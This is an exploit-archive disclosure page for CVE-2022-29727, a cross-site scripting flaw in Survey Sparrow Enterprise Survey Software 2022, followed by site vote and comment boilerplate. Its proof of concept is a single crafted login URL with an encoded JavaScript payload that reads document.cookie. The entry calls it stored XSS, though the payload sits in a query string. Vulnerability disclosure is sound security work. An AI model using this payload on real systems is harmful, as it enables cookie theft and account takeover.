Survey Sparrow Enterprise Survey Software 2022 Cross Site Scripting

2022.05.19

Credit: Pankaj Kumar Thakur

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2022-29727

CWE: CWE-79

# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Date: May 11 2022
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: https://surveysparrow.com/
# Software Link: https://surveysparrow.com/enterprise-survey-software/
# Version: 2022
# Tested on: Windows
# CVE : CVE-2022-29727
# References:
https://www.tenable.com/cve/CVE-2022-29727
https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022
#POC
For Stored XSS
Visit
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
XSS Executed

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Survey Sparrow Enterprise Survey Software 2022 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.